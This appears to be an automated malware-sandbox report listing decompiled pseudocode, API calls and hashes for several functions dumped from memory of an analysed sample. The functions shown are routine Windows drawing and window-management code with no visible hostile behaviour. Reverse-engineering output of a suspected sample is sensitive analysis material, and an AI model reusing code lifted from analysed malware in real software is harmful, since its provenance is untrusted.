                                                                                • Opcode ID: f9827d315cdbc4e10fc9f6f4317652b6d712c7bab38ee9153700b76ea893cef0
                                                                                • Instruction ID: 8c7c3c46afd78b8adb657da2d6ce0c39d83e9d96557bbb21b825c40a06f345e7
                                                                                • Opcode Fuzzy Hash: f9827d315cdbc4e10fc9f6f4317652b6d712c7bab38ee9153700b76ea893cef0
                                                                                • Instruction Fuzzy Hash: 3F512B71700115AFDB40EF6DDD82F9E37E8AF09304F50116AF905EB286CA78EC468B69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0042E254, Relevance: 12.1, APIs: 8, Instructions: 146COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 68%
                                                                                			E0042E254(void* __eax, void* __ecx, void* __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				struct HDWP__* _v28;
				int _v32;
				char _v36;
				struct tagTEXTMETRICA _v92;
				void* __ebx;
				void* __ebp;
				struct HDC__* _t85;
				void* _t88;
				void* _t111;
				char _t115;
				intOrPtr* _t117;
				void* _t142;
				signed int _t145;
				long _t146;
				signed int _t156;
				intOrPtr _t158;
				struct HDC__* _t173;
				int _t174;
				void* _t177;
				void* _t179;
				intOrPtr _t180;
				intOrPtr _t186;

				_t177 = _t179;
				_t180 = _t179 + 0xffffffa8;
				_t142 = __eax;
				_t85 =  *(__eax + 0x210);
				if( *((intOrPtr*)(_t85 + 8)) == 0 ||  *((char*)(__eax + 0x220)) != 0) {
					return _t85;
				} else {
					_push(0);
					L00406E20();
					_t173 = _t85;
					_t88 = SelectObject(_t173, E0041EB60( *((intOrPtr*)(__eax + 0x68)), __eax, __ecx));
					GetTextMetricsA(_t173,  &_v92);
					SelectObject(_t173, _t88);
					_push(_t173);
					_push(0);
					L00407080();
					_t174 =  *( *((intOrPtr*)(_t142 + 0x210)) + 8);
					_t145 =  *(_t142 + 0x21c);
					asm("cdq");
					_v8 = (_t174 + _t145 - 1) / _t145;
					asm("cdq");
					_v12 = ( *((intOrPtr*)(_t142 + 0x48)) - 0xa) / _t145;
					_t146 = _v92.tmHeight;
					_v24 =  *((intOrPtr*)(_t142 + 0x4c)) - _t146 - 5;
					asm("cdq");
					_v16 = _v24 / _v8;
					asm("cdq");
					_t34 = _v24 % _v8;
					_t156 = _t34 >> 1;
					if(_t34 < 0) {
						asm("adc edx, 0x0");
					}
					_v20 = _t156 + _t146 + 1;
					_v28 = BeginDeferWindowPos(_t174);
					_push(_t177);
					_push(0x42e3dd);
					_push( *[fs:eax]);
					 *[fs:eax] = _t180;
					_t111 =  *( *((intOrPtr*)(_t142 + 0x210)) + 8) - 1;
					if(_t111 >= 0) {
						_t115 = _t111 + 1;
						_t186 = _t115;
						_v36 = _t115;
						_v24 = 0;
						do {
							_t117 = E00413FA4( *((intOrPtr*)(_t142 + 0x210)), _v24);
							_t170 = _t117;
							 *((intOrPtr*)( *_t117 + 0x70))();
							asm("cdq");
							_v32 = _v24 / _v8 * _v12 + 8;
							if(E004037B0(_t117, _t186) != 0) {
								_v32 = E004350A4(_t142) - _v32 - _v12;
							}
							asm("cdq");
							_v28 = DeferWindowPos(_v28, E0043BD14(_t170), 0, _v32, _v24 % _v8 * _v16 + _v20, _v12, _v16, 0x14);
							E004355C0(_t170, 1);
							_v24 = _v24 + 1;
							_t81 =  &_v36;
							 *_t81 = _v36 - 1;
						} while ( *_t81 != 0);
					}
					_pop(_t158);
					 *[fs:eax] = _t158;
					_push(0x42e3e4);
					return EndDeferWindowPos(_v28);
				}
			}






























                                                                                0x0042e255
                                                                                0x0042e257
                                                                                0x0042e25d
                                                                                0x0042e25f
                                                                                0x0042e269
                                                                                0x0042e3ea
                                                                                0x0042e27c
                                                                                0x0042e27c
                                                                                0x0042e27e
                                                                                0x0042e283
                                                                                0x0042e28f
                                                                                0x0042e29b
                                                                                0x0042e2a2
                                                                                0x0042e2a7
                                                                                0x0042e2a8
                                                                                0x0042e2aa
                                                                                0x0042e2b5
                                                                                0x0042e2ba
                                                                                0x0042e2c3
                                                                                0x0042e2c6
                                                                                0x0042e2cf
                                                                                0x0042e2d2
                                                                                0x0042e2d8
                                                                                0x0042e2e0
                                                                                0x0042e2e6
                                                                                0x0042e2ea
                                                                                0x0042e2f0
                                                                                0x0042e2f1
                                                                                0x0042e2f4
                                                                                0x0042e2f6
                                                                                0x0042e2f8
                                                                                0x0042e2f8
                                                                                0x0042e2fe
                                                                                0x0042e307
                                                                                0x0042e30c
                                                                                0x0042e30d
                                                                                0x0042e312
                                                                                0x0042e315
                                                                                0x0042e321
                                                                                0x0042e324
                                                                                0x0042e32a
                                                                                0x0042e32a
                                                                                0x0042e32b
                                                                                0x0042e32e
                                                                                0x0042e335
                                                                                0x0042e33e
                                                                                0x0042e343
                                                                                0x0042e34c
                                                                                0x0042e352
                                                                                0x0042e35c
                                                                                0x0042e36c
                                                                                0x0042e37b
                                                                                0x0042e37b
                                                                                0x0042e38b
                                                                                0x0042e3ae
                                                                                0x0042e3b5
                                                                                0x0042e3ba
                                                                                0x0042e3bd
                                                                                0x0042e3bd
                                                                                0x0042e3bd
                                                                                0x0042e335
                                                                                0x0042e3c8
                                                                                0x0042e3cb
                                                                                0x0042e3ce
                                                                                0x0042e3dc
                                                                                0x0042e3dc

                                                                                APIs
                                                                                • 72E7AC50.USER32(00000000), ref: 0042E27E
                                                                                  • Part of subcall function 0041EB60: CreateFontIndirectA.GDI32(?), ref: 0041EC9E
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0042E28F
                                                                                • GetTextMetricsA.GDI32(00000000,?), ref: 0042E29B
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0042E2A2
                                                                                • 72E7B380.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E2AA
                                                                                • BeginDeferWindowPos.USER32 ref: 0042E302
                                                                                • DeferWindowPos.USER32(?,00000000,00000000,?,?,?,00000000,?), ref: 0042E3A9
                                                                                • EndDeferWindowPos.USER32(?,0042E3E4,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E3D7
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: DeferWindow$ObjectSelect$B380BeginCreateFontIndirectMetricsText
                                                                                • String ID:
                                                                                • API String ID: 2543476052-0
                                                                                • Opcode ID: 04145a869496cb02b33ca182ebaf35b8f27f04055b291b8486f22ebdef0f9f00
                                                                                • Instruction ID: e380a197be4a0b5e9c39d3c693654ceb05a77081704d619803c21c70eeb1f8a7
                                                                                • Opcode Fuzzy Hash: 04145a869496cb02b33ca182ebaf35b8f27f04055b291b8486f22ebdef0f9f00
                                                                                • Instruction Fuzzy Hash: 02414E71A001199FCB00DFAED885BAEBBF5EF48315F14406AF904EB391D678AD01CBA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0045227C, Relevance: 12.1, APIs: 8, Instructions: 138windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 74%
                                                                                			E0045227C(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v22;
				intOrPtr _v28;
				struct HWND__* _v32;
				char _v36;
				intOrPtr _t50;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t68;
				intOrPtr _t83;
				void* _t88;
				intOrPtr _t120;
				void* _t122;
				void* _t125;
				void* _t126;
				intOrPtr _t127;

				_t123 = __esi;
				_t122 = __edi;
				_t125 = _t126;
				_t127 = _t126 + 0xffffffe0;
				_push(__ebx);
				_push(__esi);
				_v36 = 0;
				_v8 = __eax;
				_push(_t125);
				_push(0x45250c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				E00433F00();
				if( *((char*)(_v8 + 0x57)) != 0 ||  *((intOrPtr*)( *_v8 + 0x50))() == 0 || ( *(_v8 + 0x2ec) & 0x00000008) != 0 ||  *((char*)(_v8 + 0x22f)) == 1) {
					_t50 =  *0x486bbc; // 0x41cc7c
					E00406520(_t50,  &_v36);
					E0040A0B0(_v36, 1);
					E00403D80();
				}
				if(GetCapture() != 0) {
					SendMessageA(GetCapture(), 0x1f, 0, 0);
				}
				ReleaseCapture();
				 *(_v8 + 0x2ec) =  *(_v8 + 0x2ec) | 0x00000008;
				_v32 = GetActiveWindow();
				_t58 =  *0x46bb1c; // 0x0
				_v20 = _t58;
				_t59 =  *0x487c00; // 0x2290f1c
				_t60 =  *0x487c00; // 0x2290f1c
				E00414020( *((intOrPtr*)(_t60 + 0x7c)),  *((intOrPtr*)(_t59 + 0x78)), 0);
				_t63 =  *0x487c00; // 0x2290f1c
				 *((intOrPtr*)(_t63 + 0x78)) = _v8;
				_t64 =  *0x487c00; // 0x2290f1c
				_v22 =  *((intOrPtr*)(_t64 + 0x44));
				_t66 =  *0x487c00; // 0x2290f1c
				E004536E4(_t66,  *((intOrPtr*)(_t59 + 0x78)), 0);
				_t68 =  *0x487c00; // 0x2290f1c
				_v28 =  *((intOrPtr*)(_t68 + 0x48));
				_v16 = E0044C690(0, 0x487bfc, _t122, _t123);
				_push(_t125);
				_push(0x4524ec);
				_push( *[fs:edx]);
				 *[fs:edx] = _t127;
				E004521CC(_v8);
				_push(_t125);
				_push(0x45244b);
				_push( *[fs:edx]);
				 *[fs:edx] = _t127;
				SendMessageA(E0043BD14(_v8), 0xb000, 0, 0);
				 *((intOrPtr*)(_v8 + 0x24c)) = 0;
				do {
					E0045541C( *0x487bfc, _t122, _t123);
					if( *((char*)( *0x487bfc + 0x9c)) == 0) {
						if( *((intOrPtr*)(_v8 + 0x24c)) != 0) {
							E0045212C(_v8);
						}
					} else {
						 *((intOrPtr*)(_v8 + 0x24c)) = 2;
					}
					_t83 =  *((intOrPtr*)(_v8 + 0x24c));
				} while (_t83 == 0);
				_v12 = _t83;
				SendMessageA(E0043BD14(_v8), 0xb001, 0, 0);
				_t88 = E0043BD14(_v8);
				if(_t88 != GetActiveWindow()) {
					_v32 = 0;
				}
				_pop(_t120);
				 *[fs:eax] = _t120;
				_push(0x452452);
				return E004521C4();
			}


























                                                                                0x0045227c
                                                                                0x0045227c
                                                                                0x0045227d
                                                                                0x0045227f
                                                                                0x00452282
                                                                                0x00452283
                                                                                0x00452286
                                                                                0x00452289
                                                                                0x00452293
                                                                                0x00452294
                                                                                0x00452299
                                                                                0x0045229c
                                                                                0x0045229f
                                                                                0x004522ab
                                                                                0x004522d4
                                                                                0x004522d9
                                                                                0x004522e8
                                                                                0x004522ed
                                                                                0x004522ed
                                                                                0x004522f9
                                                                                0x00452307
                                                                                0x00452307
                                                                                0x0045230c
                                                                                0x00452314
                                                                                0x00452320
                                                                                0x00452323
                                                                                0x00452328
                                                                                0x0045232b
                                                                                0x00452333
                                                                                0x0045233d
                                                                                0x00452342
                                                                                0x0045234a
                                                                                0x0045234d
                                                                                0x00452356
                                                                                0x0045235c
                                                                                0x00452361
                                                                                0x00452366
                                                                                0x0045236e
                                                                                0x00452378
                                                                                0x0045237d
                                                                                0x0045237e
                                                                                0x00452383
                                                                                0x00452386
                                                                                0x0045238c
                                                                                0x00452393
                                                                                0x00452394
                                                                                0x00452399
                                                                                0x0045239c
                                                                                0x004523b1
                                                                                0x004523bb
                                                                                0x004523c1
                                                                                0x004523c3
                                                                                0x004523d1
                                                                                0x004523ec
                                                                                0x004523f1
                                                                                0x004523f1
                                                                                0x004523d3
                                                                                0x004523d6
                                                                                0x004523d6
                                                                                0x004523f9
                                                                                0x004523ff
                                                                                0x00452403
                                                                                0x00452418
                                                                                0x00452420
                                                                                0x0045242e
                                                                                0x00452432
                                                                                0x00452432
                                                                                0x00452437
                                                                                0x0045243a
                                                                                0x0045243d
                                                                                0x0045244a

                                                                                APIs
                                                                                • GetCapture.USER32 ref: 004522F2
                                                                                • GetCapture.USER32 ref: 00452301
                                                                                • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00452307
                                                                                • ReleaseCapture.USER32(00000000,0045250C), ref: 0045230C
                                                                                • GetActiveWindow.USER32 ref: 0045231B
                                                                                • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 004523B1
                                                                                • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00452418
                                                                                • GetActiveWindow.USER32 ref: 00452427
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                • String ID:
                                                                                • API String ID: 862346643-0
                                                                                • Opcode ID: 6fb19725fa897b49366f234f17a85424d251169073f2b89c6bdeb30c45be70e6
                                                                                • Instruction ID: b629a4e8d731a575979ed138cee1ab300dc18be91145e05793bf1a9acf88d777
                                                                                • Opcode Fuzzy Hash: 6fb19725fa897b49366f234f17a85424d251169073f2b89c6bdeb30c45be70e6
                                                                                • Instruction Fuzzy Hash: EB513030A00204AFD711EF6AC946B9E77F1EF49304F1544BAF904AB3A2D778AD44DB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00439DF0, Relevance: 12.1, APIs: 8, Instructions: 123COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00439DF0(void* __eax, void* __ecx, struct HDC__* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				int _v16;
				char _v20;
				struct tagRECT _v36;
				signed int _t54;
				intOrPtr _t59;
				int _t61;
				void* _t63;
				void* _t66;
				void* _t82;
				int _t98;
				struct HDC__* _t99;

				_t99 = __edx;
				_t82 = __eax;
				 *(__eax + 0x54) =  *(__eax + 0x54) | 0x00000080;
				_v16 = SaveDC(__edx);
				E00433FDC(__edx, _a4, __ecx);
				IntersectClipRect(__edx, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
				_t98 = 0;
				_v12 = 0;
				if((GetWindowLongA(E0043BD14(_t82), 0xffffffec) & 0x00000002) == 0) {
					_t54 = GetWindowLongA(E0043BD14(_t82), 0xfffffff0);
					__eflags = _t54 & 0x00800000;
					if((_t54 & 0x00800000) != 0) {
						_v12 = 3;
						_t98 = 0xa00f;
					}
				} else {
					_v12 = 0xa;
					_t98 = 0x200f;
				}
				if(_t98 != 0) {
					SetRect( &_v36, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
					DrawEdge(_t99,  &_v36, _v12, _t98);
					E00433FDC(_t99, _v36.top, _v36.left);
					IntersectClipRect(_t99, 0, 0, _v36.right - _v36.left, _v36.bottom - _v36.top);
				}
				E00436848(_t82, _t99, 0x14, 0);
				E00436848(_t82, _t99, 0xf, 0);
				_t59 =  *((intOrPtr*)(_t82 + 0x19c));
				if(_t59 == 0) {
					L12:
					_t61 = RestoreDC(_t99, _v16);
					 *(_t82 + 0x54) =  *(_t82 + 0x54) & 0x0000ff7f;
					return _t61;
				} else {
					_t63 =  *((intOrPtr*)(_t59 + 8)) - 1;
					if(_t63 < 0) {
						goto L12;
					}
					_v20 = _t63 + 1;
					_v8 = 0;
					do {
						_t66 = E00413FA4( *((intOrPtr*)(_t82 + 0x19c)), _v8);
						_t107 =  *((char*)(_t66 + 0x57));
						if( *((char*)(_t66 + 0x57)) != 0) {
							E00439DF0(_t66,  *((intOrPtr*)(_t66 + 0x40)), _t99, _t107,  *((intOrPtr*)(_t66 + 0x44)));
						}
						_v8 = _v8 + 1;
						_t36 =  &_v20;
						 *_t36 = _v20 - 1;
					} while ( *_t36 != 0);
					goto L12;
				}
			}
















                                                                                0x00439dfb
                                                                                0x00439dfd
                                                                                0x00439dff
                                                                                0x00439e0b
                                                                                0x00439e15
                                                                                0x00439e27
                                                                                0x00439e2c
                                                                                0x00439e30
                                                                                0x00439e45
                                                                                0x00439e5f
                                                                                0x00439e64
                                                                                0x00439e69
                                                                                0x00439e6b
                                                                                0x00439e72
                                                                                0x00439e72
                                                                                0x00439e47
                                                                                0x00439e47
                                                                                0x00439e4e
                                                                                0x00439e4e
                                                                                0x00439e79
                                                                                0x00439e8b
                                                                                0x00439e9a
                                                                                0x00439ea7
                                                                                0x00439ebf
                                                                                0x00439ebf
                                                                                0x00439ecf
                                                                                0x00439edf
                                                                                0x00439ee4
                                                                                0x00439eec
                                                                                0x00439f2b
                                                                                0x00439f30
                                                                                0x00439f35
                                                                                0x00439f41
                                                                                0x00439eee
                                                                                0x00439ef1
                                                                                0x00439ef4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00439ef7
                                                                                0x00439efa
                                                                                0x00439f01
                                                                                0x00439f0a
                                                                                0x00439f0f
                                                                                0x00439f13
                                                                                0x00439f1e
                                                                                0x00439f1e
                                                                                0x00439f23
                                                                                0x00439f26
                                                                                0x00439f26
                                                                                0x00439f26
                                                                                0x00000000
                                                                                0x00439f01

                                                                                APIs
                                                                                • SaveDC.GDI32 ref: 00439E06
                                                                                  • Part of subcall function 00433FDC: GetWindowOrgEx.GDI32(?), ref: 00433FEA
                                                                                  • Part of subcall function 00433FDC: SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 00434000
                                                                                • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00439E27
                                                                                • GetWindowLongA.USER32 ref: 00439E3D
                                                                                • GetWindowLongA.USER32 ref: 00439E5F
                                                                                • SetRect.USER32 ref: 00439E8B
                                                                                • DrawEdge.USER32(?,?,?,00000000), ref: 00439E9A
                                                                                • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00439EBF
                                                                                • RestoreDC.GDI32(?,?), ref: 00439F30
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave
                                                                                • String ID:
                                                                                • API String ID: 2976466617-0
                                                                                • Opcode ID: a34654bd2eab7aa8714caa64271e09f7e2008bbca78343f7de88e4e5b9632120
                                                                                • Instruction ID: 0a2c6d2463048ccdf29597ec985fa3fb5adccc33b0d18335653a708fa4918e7f
                                                                                • Opcode Fuzzy Hash: a34654bd2eab7aa8714caa64271e09f7e2008bbca78343f7de88e4e5b9632120
                                                                                • Instruction Fuzzy Hash: 7A416471B001156BDB00EEA9CC81F9E77B8AF48304F10506AFA15EB3C6D67DDD018BA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0045CC58, Relevance: 12.1, APIs: 8, Instructions: 102COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0045CC58(void* __eax, void* __edx) {
				char _v12;
				int _v24;
				int _v28;
				signed int _v48;
				signed int _v52;
				int _t53;
				int _t55;
				signed int _t60;
				signed int _t63;
				int _t82;
				int _t84;
				signed int _t89;
				signed int _t92;
				void* _t97;
				void* _t111;

				_t97 = __eax;
				if(__edx == 0) {
					E0041295C(0, _t111, 0);
					E0041295C(1,  &_v12, 1);
					SetMapMode(E0041FDC4( *((intOrPtr*)(_t97 + 0x208))), 8);
					SetWindowOrgEx(E0041FDC4( *((intOrPtr*)(_t97 + 0x208))), _v28, _v24, 0);
					_t53 = E004350E8(_t97);
					_t55 = E004350A4(_t97);
					SetViewportExtEx(E0041FDC4( *((intOrPtr*)(_t97 + 0x208))), _t55, _t53, 0);
					_t60 = E004350E8(_t97);
					_t63 = E004350A4(_t97);
					return SetWindowExtEx(E0041FDC4( *((intOrPtr*)(_t97 + 0x208))), _t63 * _v52, _t60 * _v48, 0);
				}
				E0041295C(E0041295C(E004350A4(__eax), _t111, 0) | 0xffffffff,  &_v12, 1);
				SetMapMode(E0041FDC4( *((intOrPtr*)(_t97 + 0x208))), 8);
				SetWindowOrgEx(E0041FDC4( *((intOrPtr*)(_t97 + 0x208))), _v28, _v24, 0);
				_t82 = E004350E8(_t97);
				_t84 = E004350A4(_t97);
				SetViewportExtEx(E0041FDC4( *((intOrPtr*)(_t97 + 0x208))), _t84, _t82, 0);
				_t89 = E004350E8(_t97);
				_t92 = E004350A4(_t97);
				return SetWindowExtEx(E0041FDC4( *((intOrPtr*)(_t97 + 0x208))), _t92 * _v52, _t89 * _v48, 0);
			}


















                                                                                0x0045cc5c
                                                                                0x0045cc60
                                                                                0x0045cd10
                                                                                0x0045cd23
                                                                                0x0045cd36
                                                                                0x0045cd53
                                                                                0x0045cd5c
                                                                                0x0045cd64
                                                                                0x0045cd76
                                                                                0x0045cd7f
                                                                                0x0045cd8b
                                                                                0x00000000
                                                                                0x0045cda1
                                                                                0x0045cc82
                                                                                0x0045cc95
                                                                                0x0045ccb2
                                                                                0x0045ccbb
                                                                                0x0045ccc3
                                                                                0x0045ccd5
                                                                                0x0045ccde
                                                                                0x0045ccea
                                                                                0x00000000

                                                                                APIs
                                                                                • SetMapMode.GDI32(00000000,00000008), ref: 0045CC95
                                                                                • SetWindowOrgEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045CCB2
                                                                                • SetViewportExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045CCD5
                                                                                • SetWindowExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045CD00
                                                                                • SetMapMode.GDI32(00000000,00000008), ref: 0045CD36
                                                                                • SetWindowOrgEx.GDI32(00000000,?,?,00000000), ref: 0045CD53
                                                                                • SetViewportExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045CD76
                                                                                • SetWindowExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045CDA1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$ModeViewport
                                                                                • String ID:
                                                                                • API String ID: 3149394475-0
                                                                                • Opcode ID: ad73196d661b0662b977ea4ddc5ec0c350c4bd56559773a71098fe9f989c67dc
                                                                                • Instruction ID: e0da8c87a236fb087fc382737a2b647bc55f7f1c6ba116ed6a76608d3ac074bb
                                                                                • Opcode Fuzzy Hash: ad73196d661b0662b977ea4ddc5ec0c350c4bd56559773a71098fe9f989c67dc
                                                                                • Instruction Fuzzy Hash: 8B315E703043016BD744FB7ACC86B9B26989F48308F00593FB996EB2D7CA7DC8894369
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004206FC, Relevance: 12.1, APIs: 8, Instructions: 79COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 26%
                                                                                			E004206FC(void* __ebx) {
				intOrPtr _v8;
				char _v1000;
				char _v1004;
				char _v1032;
				signed int _v1034;
				short _v1036;
				void* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr _t45;
				intOrPtr _t52;
				void* _t54;
				void* _t55;

				_t54 = _t55;
				_v1036 = 0x300;
				_v1034 = 0x10;
				_t25 = E00402994(_t24, 0x40,  &_v1032);
				_push(0);
				L00406E20();
				_v8 = _t25;
				_push(_t54);
				_push(0x4207f9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t55 + 0xfffffbf8;
				_push(0x68);
				_t27 = _v8;
				_push(_t27);
				L00406AF8();
				_t45 = _t27;
				if(_t45 >= 0x10) {
					_push( &_v1032);
					_push(8);
					_push(0);
					_push(_v8);
					L00406B38();
					if(_v1004 != 0xc0c0c0) {
						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x424);
						_push(8);
						_push(_t45 - 8);
						_push(_v8);
						L00406B38();
					} else {
						_push( &_v1004);
						_push(1);
						_push(_t45 - 8);
						_push(_v8);
						L00406B38();
						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x420);
						_push(7);
						_push(_t45 - 7);
						_push(_v8);
						L00406B38();
						_push( &_v1000);
						_push(1);
						_push(7);
						_push(_v8);
						L00406B38();
					}
				}
				_pop(_t52);
				 *[fs:eax] = _t52;
				_push(E00420800);
				_t29 = _v8;
				_push(_t29);
				_push(0);
				L00407080();
				return _t29;
			}

















                                                                                0x004206fd
                                                                                0x00420706
                                                                                0x0042070f
                                                                                0x00420723
                                                                                0x00420728
                                                                                0x0042072a
                                                                                0x0042072f
                                                                                0x00420734
                                                                                0x00420735
                                                                                0x0042073a
                                                                                0x0042073d
                                                                                0x00420740
                                                                                0x00420742
                                                                                0x00420745
                                                                                0x00420746
                                                                                0x0042074b
                                                                                0x00420750
                                                                                0x0042075c
                                                                                0x0042075d
                                                                                0x0042075f
                                                                                0x00420764
                                                                                0x00420765
                                                                                0x00420774
                                                                                0x004207d0
                                                                                0x004207d1
                                                                                0x004207d6
                                                                                0x004207da
                                                                                0x004207db
                                                                                0x00420776
                                                                                0x0042077c
                                                                                0x0042077d
                                                                                0x00420784
                                                                                0x00420788
                                                                                0x00420789
                                                                                0x0042079c
                                                                                0x0042079d
                                                                                0x004207a2
                                                                                0x004207a6
                                                                                0x004207a7
                                                                                0x004207b2
                                                                                0x004207b3
                                                                                0x004207b5
                                                                                0x004207ba
                                                                                0x004207bb
                                                                                0x004207bb
                                                                                0x00420774
                                                                                0x004207e2
                                                                                0x004207e5
                                                                                0x004207e8
                                                                                0x004207ed
                                                                                0x004207f0
                                                                                0x004207f1
                                                                                0x004207f3
                                                                                0x004207f8

                                                                                APIs
                                                                                • 72E7AC50.USER32(00000000), ref: 0042072A
                                                                                • 72E7AD70.GDI32(?,00000068,00000000,004207F9,?,00000000), ref: 00420746
                                                                                • 72E7AEF0.GDI32(?,00000000,00000008,?,?,00000068,00000000,004207F9,?,00000000), ref: 00420765
                                                                                • 72E7AEF0.GDI32(?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,004207F9,?,00000000), ref: 00420789
                                                                                • 72E7AEF0.GDI32(?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,004207F9), ref: 004207A7
                                                                                • 72E7AEF0.GDI32(?,00000007,00000001,?,?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?), ref: 004207BB
                                                                                • 72E7AEF0.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,004207F9,?,00000000), ref: 004207DB
                                                                                • 72E7B380.USER32(00000000,?,00420800,004207F9,?,00000000), ref: 004207F3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
